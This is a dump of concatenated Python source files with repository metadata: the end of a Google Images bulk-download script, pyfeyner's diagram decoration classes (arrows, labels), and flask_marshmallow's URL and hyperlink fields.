key, value in params.items(): if value[0] is not None: ext_param = value[1][value[0]] # counter will tell if it is first param added or not if counter == 0: # add it to the built url built_url = built_url + ext_param counter += 1 else: built_url = built_url + ',' + ext_param counter += 1 built_url = lang_url+built_url+exact_size+time_range return built_url #building main search URL def build_search_url(self,search_term,params,url,similar_images,specific_site,safe_search): #check safe_search safe_search_string = "&safe=active" # check the args and choose the URL if url: url = url elif similar_images: print(similar_images) keywordem = self.similar_images(similar_images) url = 'https://www.google.com/search?q=' + keywordem + '&espv=2&biw=1366&bih=667&site=webhp&source=lnms&tbm=isch&sa=X&ei=XosDVaCXD8TasATItgE&ved=0CAcQ_AUoAg' elif specific_site: url = 'https://www.google.com/search?q=' + quote( search_term.encode('utf-8')) + '&as_sitesearch=' + specific_site + '&espv=2&biw=1366&bih=667&site=webhp&source=lnms&tbm=isch' + params + '&sa=X&ei=XosDVaCXD8TasATItgE&ved=0CAcQ_AUoAg' else: url = 'https://www.google.com/search?q=' + quote( search_term.encode('utf-8')) + '&espv=2&biw=1366&bih=667&site=webhp&source=lnms&tbm=isch' + params + '&sa=X&ei=XosDVaCXD8TasATItgE&ved=0CAcQ_AUoAg' #safe search check if safe_search: url = url + safe_search_string return url #measures the file size def file_size(self,file_path): if os.path.isfile(file_path): file_info = os.stat(file_path) size = file_info.st_size for x in ['bytes', 'KB', 'MB', 'GB', 'TB']: if size < 1024.0: return "%3.1f %s" % (size, x) size /= 1024.0 return size 
#keywords from file def keywords_from_file(self,file_name): search_keyword = [] with codecs.open(file_name, 'r', encoding='utf-8-sig') as f: if '.csv' in file_name: for line in f: if line in ['\n', '\r\n']: pass else: search_keyword.append(line.replace('\n', '').replace('\r', '')) elif '.txt' in file_name: for line in f: if line in ['\n', '\r\n']: pass else: search_keyword.append(line.replace('\n', '').replace('\r', '')) else: print("Invalid file type: Valid file types are either .txt or .csv \n" "exiting...") sys.exit() return search_keyword # make directories def create_directories(self,main_directory, dir_name,thumbnail,thumbnail_only): dir_name_thumbnail = dir_name + " - thumbnail" # make a search keyword directory try: if not os.path.exists(main_directory): os.makedirs(main_directory) time.sleep(0.2) path = (dir_name) sub_directory = os.path.join(main_directory, path) if not os.path.exists(sub_directory): os.makedirs(sub_directory) if thumbnail or thumbnail_only: sub_directory_thumbnail = os.path.join(main_directory, dir_name_thumbnail) if not os.path.exists(sub_directory_thumbnail): os.makedirs(sub_directory_thumbnail) else: path = (dir_name) sub_directory = os.path.join(main_directory, path) if not os.path.exists(sub_directory): os.makedirs(sub_directory) if thumbnail or thumbnail_only: sub_directory_thumbnail = os.path.join(main_directory, dir_name_thumbnail) if not os.path.exists(sub_directory_thumbnail): os.makedirs(sub_directory_thumbnail) except OSError as e: if e.errno != 17: raise pass return # Download Image thumbnails def download_image_thumbnail(self,image_url,main_directory,dir_name,return_image_name,print_urls,socket_timeout,print_size,no_download,save_source,img_src,ignore_urls): if print_urls or no_download: print("Image URL: " + image_url) if no_download: return "success","Printed url without downloading" try: req = Request(image_url, headers={ "User-Agent": "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"}) try: # timeout time to download an image if socket_timeout: timeout = float(socket_timeout) else: timeout = 10 response = urlopen(req, None, timeout) data = response.read() response.close() path = main_directory + "/" + dir_name + " - thumbnail" + "/" + return_image_name try: output_file = open(path, 'wb') output_file.write(data) output_file.close() if save_source: list_path = main_directory + "/" + save_source + ".txt" list_file = open(list_path,'a') list_file.write(path + '\t' + img_src + '\n') list_file.close() except OSError as e: download_status = 'fail' download_message = "OSError on an image...trying next one..." + " Error: " + str(e) except IOError as e: download_status = 'fail' download_message = "IOError on an image...trying next one..." + " Error: " + str(e) download_status = 'success' download_message = "Completed Image Thumbnail ====> " + return_image_name # image size parameter if print_size: print("Image Size: " + str(self.file_size(path))) except UnicodeEncodeError as e: download_status = 'fail' download_message = "UnicodeEncodeError on an image...trying next one..." + " Error: " + str(e) except HTTPError as e: # If there is any HTTPError download_status = 'fail' download_message = "HTTPError on an image...trying next one..." + " Error: " + str(e) except URLError as e: download_status = 'fail' download_message = "URLError on an image...trying next one..." 
+ " Error: " + str(e) except ssl.CertificateError as e: download_status = 'fail' download_message = "CertificateError on an image...trying next one..." + " Error: " + str(e) except IOError as e: # If there is any IOError download_status = 'fail' download_message = "IOError on an image...trying next one..." + " Error: " + str(e) return download_status, download_message # Download Images def download_image(self,image_url,image_format,main_directory,dir_name,count,print_urls,socket_timeout,prefix,print_size,no_numbering,no_download,save_source,img_src,silent_mode,thumbnail_only,format,ignore_urls): if not silent_mode: if print_urls or no_download: print("Image URL: " + image_url) if ignore_urls: if any(url in image_url for url in ignore_urls.split(',')): return "fail", "Image ignored due to 'ignore url' parameter", None, image_url if thumbnail_only: return "success", "Skipping image download...", str(image_url[(image_url.rfind('/')) + 1:]), image_url if no_download: return "success","Printed url without downloading",None,image_url try: req = Request(image_url, headers={ "User-Agent": "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"}) try: # timeout time to download an image if socket_timeout: timeout = float(socket_timeout) else: timeout = 10 response = urlopen(req, None, timeout) data = response.read() response.close() extensions = [".jpg", ".jpeg", ".gif", ".png", ".bmp", ".svg", ".webp", ".ico"] # keep everything after the last '/' image_name = str(image_url[(image_url.rfind('/')) + 1:]) if format: if not image_format or image_format != format: download_status = 'fail' download_message = "Wrong image format returned. Skipping..." return_image_name = '' absolute_path = '' return download_status, download_message, return_image_name, absolute_path if image_format == "" or not image_format or "." + image_format not in extensions: download_status = 'fail' download_message = "Invalid or missing image format. Skipping..." return_image_name = '' absolute_path = '' return download_status, download_message, return_image_name, absolute_path elif image_name.lower().find("." + image_format) < 0: image_name = image_name + "." + image_format else: image_name = image_name[:image_name.lower().find("." + image_format) + (len(image_format) + 1)] # prefix name in image if prefix: prefix = prefix + " " else: prefix = '' if no_numbering: path = main_directory + "/" + dir_name + "/" + prefix + image_name else: path = main_directory + "/" + dir_name + "/" + prefix + str(count) + "." + image_name try: output_file = open(path, 'wb') output_file.write(data) output_file.close() if save_source: list_path = main_directory + "/" + save_source + ".txt" list_file = open(list_path,'a') list_file.write(path + '\t' + img_src + '\n') list_file.close() absolute_path = os.path.abspath(path) except OSError as e: download_status = 'fail' download_message = "OSError on an image...trying next one..." + " Error: " + str(e) return_image_name = '' absolute_path = '' #return image name back to calling method to use it for thumbnail downloads download_status = 'success' download_message = "Completed Image ====> " + prefix + str(count) + "." + image_name return_image_name = prefix + str(count) + "." + image_name # image size parameter if not silent_mode: if print_size: print("Image Size: " + str(self.file_size(path))) except UnicodeEncodeError as e: download_status = 'fail' download_message = "UnicodeEncodeError on an image...trying next one..." 
+ " Error: " + str(e) return_image_name = '' absolute_path = '' except URLError as e: download_status = 'fail' download_message = "URLError on an image...trying next one..." + " Error: " + str(e) return_image_name = '' absolute_path = '' except BadStatusLine as e: download_status = 'fail' download_message = "BadStatusLine on an image...trying next one..." + " Error: " + str(e) return_image_name = '' absolute_path = '' except HTTPError as e: # If there is any HTTPError download_status = 'fail' download_message = "HTTPError on an image...trying next one..." + " Error: " + str(e) return_image_name = '' absolute_path = '' except URLError as e: download_status = 'fail' download_message = "URLError on an image...trying next one..." + " Error: " + str(e) return_image_name = '' absolute_path = '' except ssl.CertificateError as e: download_status = 'fail' download_message = "CertificateError on an image...trying next one..." + " Error: " + str(e) return_image_name = '' absolute_path = '' except IOError as e: # If there is any IOError download_status = 'fail' download_message = "IOError on an image...trying next one..." + " Error: " + str(e) return_image_name = '' absolute_path = '' except IncompleteRead as e: download_status = 'fail' download_message = "IncompleteReadError on an image...trying next one..." + " Error: " + str(e) return_image_name = '' absolute_path = '' return download_status,download_message,return_image_name,absolute_path # Finding 'Next Image' from the given raw page def _get_next_item(self,s): start_line = s.find('rg_meta notranslate') if start_line == -1: # If no links are found then give an error! end_quote = 0 link = "no_links" return link, end_quote else: start_line = s.find('class="rg_meta notranslate">') start_object = s.find('{', start_line + 1) end_object = s.find('</div>', start_object + 1) object_raw = str(s[start_object:end_object]) #remove escape characters based on python version version = (3, 0) cur_version = sys.version_info if cur_version >= version: #python3 try: object_decode = bytes(object_raw, "utf-8").decode("unicode_escape") final_object = json.loads(object_decode) except: final_object = "" else: #python2 try: final_object = (json.loads(self.repair(object_raw))) except: final_object = "" return final_object, end_object # Getting all links with the help of '_images_get_next_image' def _get_all_items(self,page,main_directory,dir_name,limit,arguments): items = [] abs_path = [] errorCount = 0 i = 0 count = 1 while count < limit+1: object, end_content = self._get_next_item(page) if object == "no_links": break elif object == "": page = page[end_content:] elif arguments['offset'] and count < int(arguments['offset']): count += 1 page = page[end_content:] else: #format the item for readability object = self.format_object(object) if arguments['metadata']: if not arguments["silent_mode"]: print("\nImage Metadata: " + str(object)) #download the images download_status,download_message,return_image_name,absolute_path = self.download_image(object['image_link'],object['image_format'],main_directory,dir_name,count,arguments['print_urls'],arguments['socket_timeout'],arguments['prefix'],arguments['print_size'],arguments['no_numbering'],arguments['no_download'],arguments['save_source'],object['image_source'],arguments["silent_mode"],arguments["thumbnail_only"],arguments['format'],arguments['ignore_urls']) if not arguments["silent_mode"]: print(download_message) if download_status == "success": # download image_thumbnails if arguments['thumbnail'] or 
arguments["thumbnail_only"]: download_status, download_message_thumbnail = self.download_image_thumbnail(object['image_thumbnail_url'],main_directory,dir_name,return_image_name,arguments['print_urls'],arguments['socket_timeout'],arguments['print_size'],arguments['no_download'],arguments['save_source'],object['image_source'],arguments['ignore_urls']) if not arguments["silent_mode"]: print(download_message_thumbnail) count += 1 object['image_filename'] = return_image_name items.append(object) # Append all the links in the list named 'Links' abs_path.append(absolute_path) else: errorCount += 1 #delay param if arguments['delay']: time.sleep(int(arguments['delay'])) page = page[end_content:] i += 1 if count < limit: print("\n\nUnfortunately all " + str( limit) + " could not be downloaded because some images were not downloadable. " + str( count-1) + " is all we got for this search filter!") return items,errorCount,abs_path # Bulk Download def download(self,arguments): paths_agg = {} # for input coming from other python files if __name__ != "__main__": # if the calling file contains config_file param if 'config_file' in arguments: records = [] json_file = json.load(open(arguments['config_file'])) for record in range(0, len(json_file['Records'])): arguments = {} for i in args_list: arguments[i] = None for key, value in json_file['Records'][record].items(): arguments[key] = value records.append(arguments) total_errors = 0 for rec in records: paths, errors = self.download_executor(rec) for i in paths: paths_agg[i] = paths[i] if not arguments["silent_mode"]: if arguments['print_paths']: print(paths.encode('raw_unicode_escape').decode('utf-8')) total_errors = total_errors + errors return paths_agg,total_errors # if the calling file contains params directly else: paths, errors = self.download_executor(arguments) for i in paths: paths_agg[i] = paths[i] if not arguments["silent_mode"]: if arguments['print_paths']: print(paths.encode('raw_unicode_escape').decode('utf-8')) return paths_agg, errors # for input coming from CLI else: paths, errors = self.download_executor(arguments) for i in paths: paths_agg[i] = paths[i] if not arguments["silent_mode"]: if arguments['print_paths']: print(paths.encode('raw_unicode_escape').decode('utf-8')) return paths_agg, errors def download_executor(self,arguments): paths = {} errorCount = None for arg in args_list: if arg not in arguments: arguments[arg] = None ######Initialization and Validation of user arguments if arguments['keywords']: search_keyword = [str(item) for item in arguments['keywords'].split(',')] if arguments['keywords_from_file']: search_keyword = self.keywords_from_file(arguments['keywords_from_file']) # both time and time range should not be allowed in the same query if arguments['time'] and arguments['time_range']: raise ValueError('Either time or time range should be used in a query. Both cannot be used at the same time.') # both time and time range should not be allowed in the same query if arguments['size'] and arguments['exact_size']: raise ValueError('Either "size" or "exact_size" should be used in a query. 
Both cannot be used at the same time.') # both image directory and no image directory should not be allowed in the same query if arguments['image_directory'] and arguments['no_directory']: raise ValueError('You can either specify image directory or specify no image directory, not both!') # Additional words added to keywords if arguments['suffix_keywords']: suffix_keywords = [" " + str(sk) for sk in arguments['suffix_keywords'].split(',')] else: suffix_keywords = [''] # Additional words added to keywords if arguments['prefix_keywords']: prefix_keywords = [str(sk) + " " for sk in arguments['prefix_keywords'].split(',')] else: prefix_keywords = [''] # Setting limit on number of images to be downloaded if arguments['limit']: limit = int(arguments['limit']) else: limit = 100 if arguments['url']: current_time = str(datetime.datetime.now()).split('.')[0] search_keyword = [current_time.replace(":", "_")] if arguments['similar_images']: current_time = str(datetime.datetime.now()).split('.')[0] search_keyword = [current_time.replace(":", "_")] # If single_image or url argument not present then keywords is mandatory argument if arguments['single_image'] is None and arguments['url'] is None and arguments['similar_images'] is None and \ arguments['keywords'] is None and arguments['keywords_from_file'] is None: print('-------------------------------\n' 'Uh oh! Keywords is a required argument \n\n' 'Please refer to the documentation on guide to writing queries \n' 'https://github.com/hardikvasa/google-images-download#examples' '\n\nexiting!\n' '-------------------------------') sys.exit() # If this argument is present, set the custom output directory if arguments['output_directory']: main_directory = arguments['output_directory'] else: main_directory = "downloads" # Proxy settings if arguments['proxy']: os.environ["http_proxy"] = arguments['proxy'] os.environ["https_proxy"] = arguments['proxy'] ######Initialization Complete total_errors = 0 for pky in prefix_keywords: # 1.for every prefix keywords for sky in suffix_keywords: # 2.for every suffix keywords i = 0 while i < len(search_keyword): # 3.for every main keyword iteration = "\n" + "Item no.: " + str(i + 1) + " -->" + " Item name = " + (pky) + (search_keyword[i]) + (sky) if not arguments["silent_mode"]: print(iteration.encode('raw_unicode_escape').decode('utf-8')) print("Evaluating...") else: print("Downloading images for: " + (pky) + (search_keyword[i]) + (sky) + " ...") search_term = pky + search_keyword[i] + sky if arguments['image_directory']: dir_name = arguments['image_directory'] elif arguments['no_directory']: dir_name = '' else: dir_name = search_term + ('-' + arguments['color'] if arguments['color'] else '') #sub-directory if not arguments["no_download"]: self.create_directories(main_directory,dir_name,arguments['thumbnail'],arguments['thumbnail_only']) #create directories in OS params = self.build_url_parameters(arguments) #building URL with params url = self.build_search_url(search_term,params,arguments['url'],arguments['similar_images'],arguments['specific_site'],arguments['safe_search']) #building main search url if limit < 101: raw_html = self.download_page(url) # download page else: raw_html = self.download_extended_page(url,arguments['chromedriver']) if not arguments["silent_mode"]: if arguments['no_download']: print("Getting URLs without downloading images...") else: print("Starting Download...") items,errorCount,abs_path = self._get_all_items(raw_html,main_directory,dir_name,limit,arguments) #get all image items and download images 
paths[pky + search_keyword[i] + sky] = abs_path #dumps into a json file if arguments['extract_metadata']: try: if not os.path.exists("logs"): os.makedirs("logs") except OSError as e: print(e) json_file = open("logs/"+search_keyword[i]+".json", "w") json.dump(items, json_file, indent=4, sort_keys=True) json_file.close() #Related images if arguments['related_images']: print("\nGetting list of related keywords...this may take a few moments") tabs = self.get_all_tabs(raw_html) for key, value in tabs.items(): final_search_term = (search_term + " - " + key) print("\nNow Downloading - " + final_search_term) if limit < 101: new_raw_html = self.download_page(value) # download page else: new_raw_html = self.download_extended_page(value,arguments['chromedriver']) self.create_directories(main_directory, final_search_term,arguments['thumbnail'],arguments['thumbnail_only']) self._get_all_items(new_raw_html, main_directory, search_term + " - " + key, limit,arguments) i += 1 total_errors = total_errors + errorCount if not arguments["silent_mode"]: print("\nErrors: " + str(errorCount) + "\n") return paths, total_errors #------------- Main Program -------------# def main(): records = user_input() total_errors = 0 t0 = time.time() # start the timer for arguments in records: if arguments['single_image']: # Download Single Image using a URL response = googleimagesdownload() response.single_image(arguments['single_image']) else: # or download multiple images based on keywords/keyphrase search response = googleimagesdownload() paths,errors = response.download(arguments) #wrapping response in a variable just for consistency total_errors = total_errors + errors t1 = time.time() # stop the timer total_time = t1 - t0 # Calculating the total time required to crawl, find and download all the links of 60,000 images if not arguments["silent_mode"]: print("\nEverything downloaded!") print("Total errors: " + str(total_errors)) print("Total time taken: " + str(total_time) + " Seconds") if __name__ == "__main__": main() # In[ ]:
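# Editor's sketch (not part of the original file): a minimal driver for the
# class above. `googleimagesdownload` and `args_list` are defined earlier in
# this module; the keyword and limit values are illustrative only.
def _example_bulk_download():
    arguments = {arg: None for arg in args_list}   # every expected key present
    arguments.update({'keywords': 'polar bears',   # comma-separated search terms
                      'limit': 5,                  # <= 100 avoids needing chromedriver
                      'print_urls': True,
                      'silent_mode': False})
    paths, errors = googleimagesdownload().download(arguments)
    return paths, errors                           # {search term: [absolute paths]}, error count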
mit
-2,625,954,641,360,469,500
50.941642
622
0.552625
false
4.112538
false
false
false
itoijala/pyfeyner
pyfeyner/deco.py
1
12057
# # pyfeyner - a simple Python interface for making Feynman diagrams. # Copyright (C) 2005-2010 Andy Buckley, Georg von Hippel # Copyright (C) 2013 Ismo Toijala # # pyfeyner is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # pyfeyner is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License along # with pyfeyner; if not, write to the Free Software Foundation, Inc., # 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. # """A couple of classes for decorating diagram elements.""" import math import pyx from pyfeyner.diagrams import FeynDiagram from pyfeyner.utils import Visible from pyfeyner import config class Arrow(pyx.deco.deco, pyx.attr.attr): """Arrow for Feynman diagram lines""" def __init__(self, pos=0.5, size=6*pyx.unit.v_pt, angle=45, constriction=0.8): self.pos = pos self.size = size self.angle = angle self.constriction = constriction def decorate(self, dp, texrunner=pyx.text.defaulttexrunner): """Attach arrow to a path (usually a line).""" dp.ensurenormpath() constrictionlen = self.size * self.constriction * \ math.cos(self.angle * math.pi / 360.0) arrowtopos = self.pos * dp.path.arclen() + 0.5 * self.size arrowtopath = dp.path.split(arrowtopos)[0] arrowpath = pyx.deco._arrowhead(arrowtopath, self.pos*dp.path.arclen(), 1, self.size, 45, True, constrictionlen) dp.ornaments.fill(arrowpath) return dp class FreeArrow(Visible): """Arrow not attached to any line in a diagram.""" def __init__(self, length=0.5 * pyx.unit.v_cm, size=6 * pyx.unit.v_pt, angle=45, constriction=0.8, pos=None, x=None, y=None, direction=0): self.x, self.y = 0, 0 if x is not None: self.x = x if y is not None: self.y = y if pos is not None: self.x, self.y = pos.getXY() self.direction = direction self.length = length self.size = size self.angle = angle self.constriction = constriction def draw(self, canvas): """Draw this arrow on the supplied canvas.""" endx, endy = self.x - self.length * math.sin(self.direction * math.pi / 180.0), \ self.y - self.length * math.cos(self.direction * math.pi / 180.0) linepath = pyx.deco.decoratedpath(pyx.path.path(pyx.path.moveto(endx, endy), pyx.path.lineto(self.x, self.y))) styles = [pyx.deco.earrow(size=self.size, angle=self.angle, constriction=self.constriction)] canvas.stroke(linepath.path, styles) class ParallelArrow(Visible): """Arrow running parallel to a line, for momenta, helicities etc.""" def __init__(self, line, pos=0.5, displace=0.3, length=0.5 * pyx.unit.v_cm, size=6 * pyx.unit.v_pt, angle=45, constriction=0.8, sense=1, curved=False, stems=1, stemsep=0.03): self.line = line self.pos = pos self.displace = pyx.unit.length(displace) self.length = length self.size = size self.angle = angle self.constriction = constriction self.sense = sense self.curved = curved self.stems = stems self.stemsep = stemsep def draw(self, canvas): """Draw this arrow on the supplied canvas.""" p = self.line.getPath() posparam = p.begin() + self.pos * p.arclen() x, y = self.line.fracpoint(self.pos).getXY() arrx, arry = self.line.fracpoint(self.pos + self.length / 2.0 / p.arclen()).getXY() endx, endy = self.line.fracpoint(self.pos - self.length / 2.0 / p.arclen()).getXY() # 
Calculate the displacement from the line displacement = self.displace intrinsicwidth = pyx.unit.length(0.1) if hasattr(self.line, "arcradius"): intrinsicwidth = self.line.arcradius if displacement > 0: displacement += intrinsicwidth else: displacement -= intrinsicwidth if config.DEBUG: print "Displacement = ", displacement # Position the arrow on the right hand side of lines tangent = p.tangent(posparam, displacement) normal = tangent.transformed(pyx.trafo.rotate(90, x, y)) nx, ny = normal.atend() nxcm, nycm = pyx.unit.tocm(nx - x), pyx.unit.tocm(ny - y) vx, vy = p.atbegin() vxcm, vycm = pyx.unit.tocm(x - vx), pyx.unit.tocm(y - vy) # If the arrow is on the left, flip it by 180 degrees if (vxcm * nycm - vycm * nxcm) > 0: normal = normal.transformed(pyx.trafo.rotate(180, x, y)) nx, ny = normal.atend() if displacement < 0: normal = normal.transformed(pyx.trafo.rotate(180, x, y)) nx, ny = normal.atend() # Displace the arrow by this normal vector endx, endy = endx + (nx - x), endy + (ny - y) arrx, arry = arrx + (nx - x), arry + (ny - y) if self.sense < 0: arrx, arry, endx, endy = endx, endy, arrx, arry if not self.curved: linepath = pyx.path.path(pyx.path.moveto(endx, endy), pyx.path.lineto(arrx, arry)) styles = [pyx.deco.earrow(size=self.size, angle=self.angle, constriction=self.constriction)] dist = self.stemsep n = self.stems if n > 1: # helicity style arrow arrowtopath = linepath.split(0.8 * linepath.arclen())[0] constrictionlen = self.size * self.constriction * \ math.cos(self.angle * math.pi / 360.0) arrowpath = pyx.deco._arrowhead(arrowtopath, linepath.arclen(), 1, self.size, 45, True, constrictionlen) canvas.fill(arrowpath) path = pyx.deformer.parallel(-(n + 1) / 2 * dist).deform(arrowtopath) defo = pyx.deformer.parallel(dist) for m in range(n): path = defo.deform(path) canvas.stroke(path, []) else: # ordinary (momentum) arrow canvas.stroke(linepath, styles) else: # curved arrow (always momentum-style) curvepiece = self.line.getPath().split([(self.pos*p.arclen()-self.length/2.0), (self.pos*p.arclen()+self.length/2.0)]) arrpiece = curvepiece[1] if self.sense < 0: arrpiece = arrpiece.reversed() linepath = pyx.deco.decoratedpath(pyx.deformer.parallel(displacement).deform(arrpiece)) styles = [pyx.deco.earrow(size=self.size, angle=self.angle, constriction=self.constriction)] canvas.stroke(linepath.path, styles) class Label(Visible): """General label, unattached to any diagram elements""" def __init__(self, text, pos=None, x=None, y=None, size=pyx.text.size.normalsize): self.x, self.y = 0, 0 if x is not None: self.x = x if y is not None: self.y = y self.size = size self.text = text self.textattrs = [] self.pos = pos def draw(self, canvas): """Draw this label on the supplied canvas.""" textattrs = pyx.attr.mergeattrs([pyx.text.halign.center, pyx.text.vshift.mathaxis, self.size] + self.textattrs) t = pyx.text.defaulttexrunner.text(self.x, self.y, self.text, textattrs) canvas.insert(t) class PointLabel(Label): """Label attached to points on the diagram""" def __init__(self, point, text, displace=0.3, angle=0, size=pyx.text.size.normalsize): self.size = size self.displace = pyx.unit.length(displace) self.angle = angle self.text = text self.point = point self.textattrs = [] def getPoint(self): """Get the point associated with this label.""" return self.point def setPoint(self, point): """Set the point associated with this label.""" self.point = point return self def draw(self, canvas): """Draw this label on the supplied canvas.""" x = self.point.getX() + self.displace * 
math.cos(math.radians(self.angle)) y = self.point.getY() + self.displace * math.sin(math.radians(self.angle)) textattrs = pyx.attr.mergeattrs([pyx.text.halign.center, pyx.text.vshift.mathaxis, self.size] + self.textattrs) t = pyx.text.defaulttexrunner.text(x, y, self.text, textattrs) canvas.insert(t) class LineLabel(Label): """Label for Feynman diagram lines""" def __init__(self, line, text, pos=0.5, displace=0.3, angle=0, size=pyx.text.size.normalsize): self.pos = pos self.size = size self.displace = pyx.unit.length(displace) self.angle = angle self.text = text self.line = line self.textattrs = [] def getLine(self): """Get the associated line.""" return self.line def setLine(self, line): """Set the associated line.""" self.line = line return self def draw(self, canvas): """Draw this label on the supplied canvas.""" p = self.line.getPath() #x, y = self.line.fracPoint(self.pos).getXY() posparam = p.begin() + self.pos * p.arclen() x, y = p.at(posparam) # Calculate the displacement from the line displacement = self.displace intrinsicwidth = pyx.unit.length(0.1) if hasattr(self.line, "arcradius"): intrinsicwidth = self.line.arcradius if displacement > 0: displacement += intrinsicwidth else: displacement -= intrinsicwidth if config.DEBUG: print "Displacement = ", displacement # Position the label on the right hand side of lines tangent = p.tangent(posparam, displacement) normal = tangent.transformed(pyx.trafo.rotate(90, x, y)) nx, ny = normal.atend() nxcm, nycm = pyx.unit.tocm(nx - x), pyx.unit.tocm(ny - y) vx, vy = p.atbegin() vxcm, vycm = pyx.unit.tocm(x - vx), pyx.unit.tocm(y - vy) # If the label is on the left, flip it by 180 degrees if (vxcm * nycm - vycm * nxcm) > 0: normal = normal.transformed(pyx.trafo.rotate(180, x, y)) nx, ny = normal.atend() if displacement < 0: normal = normal.transformed(pyx.trafo.rotate(180, x, y)) nx, ny = normal.atend() # Displace the label by this normal vector x, y = nx, ny textattrs = pyx.attr.mergeattrs([pyx.text.halign.center, pyx.text.vshift.mathaxis, self.size] + self.textattrs) t = pyx.text.defaulttexrunner.text(x, y, self.text, textattrs) #t.linealign(self.displace, # math.cos(self.angle * math.pi/180), # math.sin(self.angle * math.pi/180)) canvas.insert(t) __all__ = ["Arrow", "FreeArrow", "ParallelArrow", "Label", "PointLabel", "LineLabel"]
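# Editor's sketch (not part of the original file): attaching these decorations
# to a line. FeynDiagram is imported above; Point and Fermion are assumed to
# live in pyfeyner.points / pyfeyner.lines, and the coordinates are illustrative.
def _example_decorations():
    from pyfeyner.points import Point
    from pyfeyner.lines import Fermion
    fd = FeynDiagram()
    line = Fermion(Point(-2, 0), Point(2, 0))
    fd.add(line)
    fd.add(LineLabel(line, r"$e^-$", pos=0.5, displace=0.35))      # label beside the line
    fd.add(ParallelArrow(line, pos=0.5, displace=-0.3, sense=+1))  # momentum-style arrow
    return fd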
gpl-2.0
4,276,754,985,112,377,000
38.661184
99
0.565066
false
3.576683
false
false
false
tranthibaokhanh/thoughtloungev2
lib/flask_marshmallow_local/fields.py
1
4727
# -*- coding: utf-8 -*- """ flask_marshmallow.fields ~~~~~~~~~~~~~~~~~~~~~~~~ Custom, Flask-specific fields. See the following link for a list of all available fields from the marshmallow library. See http://marshmallow.readthedocs.org/en/latest/api_reference.html#module-marshmallow.fields """ import re import sys from marshmallow import fields, utils from marshmallow.exceptions import ForcedError from flask import url_for from werkzeug.routing import BuildError # Py2/3 compatibility PY2 = sys.version_info[0] == 2 if not PY2: iteritems = lambda d: iter(d.items()) else: iteritems = lambda d: d.iteritems() _tpl_pattern = re.compile(r'\s*<\s*(\S*)\s*>\s*') __all__ = [ 'URLFor', 'UrlFor', 'AbsoluteURLFor', 'AbsoluteUrlFor', 'Hyperlinks', ] def _tpl(val): """Return value within ``< >`` if possible, else return ``None``.""" match = _tpl_pattern.match(val) if match: return match.groups()[0] return None class URLFor(fields.Field): """Field that outputs the URL for an endpoint. Acts identically to Flask's ``url_for`` function, except that arguments can be pulled from the object to be serialized. Usage: :: url = URLFor('author_get', id='<id>') https_url = URLFor('author_get', id='<id>', _scheme='https', _external=True) :param str endpoint: Flask endpoint name. :param kwargs: Same keyword arguments as Flask's url_for, except string arguments enclosed in `< >` will be interpreted as attributes to pull from the object. """ _CHECK_ATTRIBUTE = False def __init__(self, endpoint, **kwargs): self.endpoint = endpoint self.params = kwargs fields.Field.__init__(self, **kwargs) def _format(self, val): return val def _serialize(self, value, key, obj): """Output the URL for the endpoint, given the kwargs passed to ``__init__``. """ param_values = {} for name, attr_tpl in iteritems(self.params): attr_name = _tpl(str(attr_tpl)) if attr_name: attribute_value = utils.get_value(attr_name, obj, default=fields.missing) if attribute_value is not fields.missing: param_values[name] = attribute_value else: raise ForcedError(AttributeError( '{attr_name!r} is not a valid ' 'attribute of {obj!r}'.format( attr_name=attr_name, obj=obj, ))) else: param_values[name] = attr_tpl try: return url_for(self.endpoint, **param_values) except BuildError as err: # Make sure BuildErrors are raised raise ForcedError(err) UrlFor = URLFor class AbsoluteURLFor(URLFor): """Field that outputs the absolute URL for an endpoint.""" def __init__(self, endpoint, **kwargs): kwargs['_external'] = True URLFor.__init__(self, endpoint=endpoint, **kwargs) def _format(self, val): return val AbsoluteUrlFor = AbsoluteURLFor def _rapply(d, func, *args, **kwargs): """Apply a function to all values in a dictionary, recursively.""" if isinstance(d, dict): return { key: _rapply(value, func, *args, **kwargs) for key, value in iteritems(d) } else: return func(d, *args, **kwargs) def _url_val(val, key, obj, **kwargs): """Function applied by `HyperlinksField` to get the correct value in the schema. """ if isinstance(val, URLFor): return val.serialize(key, obj, **kwargs) else: return val class Hyperlinks(fields.Field): """Field that outputs a dictionary of hyperlinks, given a dictionary schema with :class:`URL <flask_marshmallow.fields.URL>` objects as values. Example: :: _links = Hyperlinks({ 'self': URL('author', id='<id>'), 'collection': URL('author_list'), }) `URL` objects can be nested within the dictionary. 
:: _links = Hyperlinks({ 'self': { 'href': URL('book', id='<id>'), 'title': 'book detail' } }) :param dict schema: A dict that maps names to :class:`URL <flask_marshmallow.fields.URL>` endpoints. """ _CHECK_ATTRIBUTE = False def __init__(self, schema, **kwargs): self.schema = schema fields.Field.__init__(self, **kwargs) def _format(self, val): return val def _serialize(self, value, attr, obj): return _rapply(self.schema, _url_val, key=attr, obj=obj)
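# Editor's sketch (not part of the original file): these fields are declared
# inside a marshmallow Schema; the endpoint names 'author_detail' and 'authors'
# are illustrative and must exist in the Flask app for url_for to resolve them.
def _example_schema():
    from marshmallow import Schema

    class AuthorSchema(Schema):
        id = fields.Integer()
        _links = Hyperlinks({
            'self': URLFor('author_detail', id='<id>'),  # '<id>' is read off the object
            'collection': URLFor('authors'),
        })

    return AuthorSchema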
mit
1,358,582,022,125,161,700
27.475904
97
0.57986
false
3.919569
false
false
false
AdaptivePELE/AdaptivePELE
AdaptivePELE/constants/constants.py
1
7191
